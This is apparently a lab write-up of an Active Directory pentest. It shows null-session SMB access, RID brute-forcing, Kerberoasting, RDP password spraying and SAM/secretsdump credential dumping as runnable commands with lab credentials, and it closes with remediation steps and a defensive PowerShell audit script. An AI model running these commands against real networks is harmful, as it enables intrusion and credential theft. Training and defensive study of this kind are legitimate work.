# MartiniAD (Easy)


### Objective

The adult beverage company "Martini Bars" recently suffered a corporate breach, and its compliance and risk team requires a penetration test of one of its branch offices. The Hack Smarter team has been authorized to perform an internal black-box pentest.

#### Initial Access

The client has provided you with VPN access to their internal network, but no credentials.

### Scanning & Enumeration

```
nmap -p- --min-rate 1000 10.1.137.111
```

```
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
```

### SMB Null Session Discovery

```
nxc smb 10.1.137.111 -u l1nuxkid -p '' --shares
```


* Read access over `IPC$` (default share)
* **Critical finding:** Write access over a non-default share named `notes`

Navigating the `notes` share revealed a `notes.txt` file containing credentials for user `mprice`.


#### User Enumeration via RID Brute

```
nxc smb 10.1.137.111 -u 'l1nuxkid' -p '' --rid-brute | grep -iv SidTypeGroup | awk '{print $6}' | cut -d '\' -f 2
```


* Initial password spraying attempts using discovered usernames were unsuccessful.

### BloodHound Collection Failed

Standard BloodHound collection via nxc and bloodhound-python ran into errors, so bloodyAD was used instead to enumerate the objects writable by the compromised user.

```
nxc ldap 10.1.137.111 -u m.price -p '*martini*'  --bloodhound --collection all --dns-server 10.1.137.111
```

```
bloodhound-python -u m.price -p '*martini*' -ns 10.1.137.111 -c all -d DRY.MARTINI.BARS --zip
```



Using bloodyAD instead:

```
bloodyAD --host 10.1.137.111 -d DRY.MARTINI.BARS -u mprice -p '*martini*' get writable --detail
```

### Kerberoasting Attack

Identifying Kerberoastable accounts, i.e. user objects that carry a `servicePrincipalName`:

```
bloodyAD --host 10.1.137.111 -d DRY.MARTINI.BARS -u mprice -p '*martini*' get search --filter '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))' --attr sAMAccountName,servicePrincipalName
```

Requesting a service ticket for each account found and saving the hashes for offline cracking:

```
GetUserSPNs.py -request -dc-ip 10.1.137.111 DRY.MARTINI.BARS/mprice:'*martini*' -outputfile kerb_hash.txt
```


### Shell as athena.t0

Testing the recovered `athena_svc` password over RDP:

```
nxc rdp 10.1.137.111 -u athena_svc -p 1dirtymartini
```


```
xfreerdp3 /v:10.1.137.111 /u:athena_svc /p:'1dirtymartini' +clipboard
```


The `athena_svc` login failed, so the password was sprayed across the usernames collected from the RID brute (saved in the file `usernames`):

```
nxc rdp 10.1.137.111 -u usernames -p 1dirtymartini
```


**Success:** Credentials worked for user `athena.t0`.

The `t0` suffix suggests a tier 0 account, which is likely to hold higher privileges.

RDP:

```
xfreerdp3 /v:10.1.137.111 /u:athena.t0 /p:'1dirtymartini' +clipboard
```

Inside the session:

```
whoami /priv
```


**Finding:** User `athena.t0` has elevated admin privileges on the system.

With those rights, the local SAM and the other secrets stored on the host can be dumped:

```
nxc smb 10.1.137.111 -u athena.t0 -p 1dirtymartini --sam
```

```
secretsdump.py 'athena.t0:1dirtymartini@10.1.137.111'
```


#### Critical Issues Identified

1. **SMB Null Session Enabled** - Anonymous access allowed
2. **Plaintext Credentials in Network Share** - Sensitive data exposure
3. **Kerberoastable Service Account** - Weak password policy for service accounts
4. **Password Reuse** - Same password across multiple accounts
5. **Privileged RDP Access** - Standard users granted excessive privileges

#### Remediation Steps

* Disable SMB null session access
* Remove plaintext credentials from file shares
* Implement Managed Service Accounts (gMSA) for services
* Enforce a strong password policy (at least 25 characters for service accounts)
* Review and restrict RDP and local privilege assignments
* Implement regular password rotation for service accounts
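As an added example (not code from the writeup or the lab), the following PowerShell audit checks the remediation items above against the domain controller; `$MinServiceLen`, `$MaxAgeDays` and the privileged-group list are assumed values, and password reuse (finding 4) is not checked because it needs hash comparison.

```powershell
# Added audit script, not part of the writeup or the lab: checks the remediation
# items on a domain controller that has the RSAT ActiveDirectory module.
# $MinServiceLen and $MaxAgeDays are assumed policy values; password reuse across
# accounts (finding 4) needs hash comparison and is not covered here.
Import-Module ActiveDirectory
$MinServiceLen = 25    # remediation list: at least 25 characters for service accounts
$MaxAgeDays    = 180   # assumed rotation interval for service-account passwords

# 1. Null-session hardening in LanmanServer and LSA.
$srv = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
if ($srv.RestrictNullSessAccess -ne 1)    { Write-Warning 'RestrictNullSessAccess is not 1' }
if ($srv.NullSessionShares)               { Write-Warning "NullSessionShares: $($srv.NullSessionShares -join ',')" }
if ($lsa.RestrictAnonymous -ne 1)         { Write-Warning 'RestrictAnonymous is not 1' }
if ($lsa.EveryoneIncludesAnonymous -eq 1) { Write-Warning 'EveryoneIncludesAnonymous is enabled' }

# 2. Non-default shares that grant more than Read to broad principals (the "notes" pattern).
$broad = 'Everyone', 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'NT AUTHORITY\ANONYMOUS LOGON'
foreach ($share in Get-SmbShare | Where-Object { -not $_.Special }) {
    Get-SmbShareAccess -Name $share.Name |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.AccessRight -ne 'Read' -and $_.AccountName -in $broad } |
        ForEach-Object { Write-Warning "Share $($share.Name): $($_.AccessRight) for $($_.AccountName)" }
}

# 3. Kerberoastable accounts: user objects carrying an SPN (gMSAs are a different
#    object class and are not returned by Get-ADUser). Report password age and the
#    minimum length the effective password policy enforces on each account.
$default = Get-ADDefaultDomainPasswordPolicy
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, PasswordLastSet, MemberOf |
    ForEach-Object {
        $pol = Get-ADUserResultantPasswordPolicy -Identity $_   # empty when only the domain default applies
        if (-not $pol) { $pol = $default }
        $age = if ($_.PasswordLastSet) { (New-TimeSpan -Start $_.PasswordLastSet -End (Get-Date)).Days } else { -1 }
        [pscustomobject]@{
            Account       = $_.SamAccountName
            PasswordAge   = $age
            StaleRotation = ($age -lt 0) -or ($age -gt $MaxAgeDays)
            WeakMinLength = $pol.MinPasswordLength -lt $MinServiceLen
            Privileged    = [bool]($_.MemberOf -match '^CN=(Domain Admins|Administrators|Enterprise Admins),')
            SPNs          = $_.ServicePrincipalName -join ';'
        }
    } | Format-Table -AutoSize

# 4. Who holds interactive and admin access on the DC (the athena.t0 finding).
foreach ($g in 'Administrators', 'Remote Desktop Users') {
    $members = (Get-ADGroupMember -Identity $g -Recursive | Select-Object -ExpandProperty SamAccountName) -join ', '
    Write-Output "${g}: $members"
}
```

Run it from an elevated PowerShell session on the DC; every warning or flagged row maps to one of the findings listed above.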

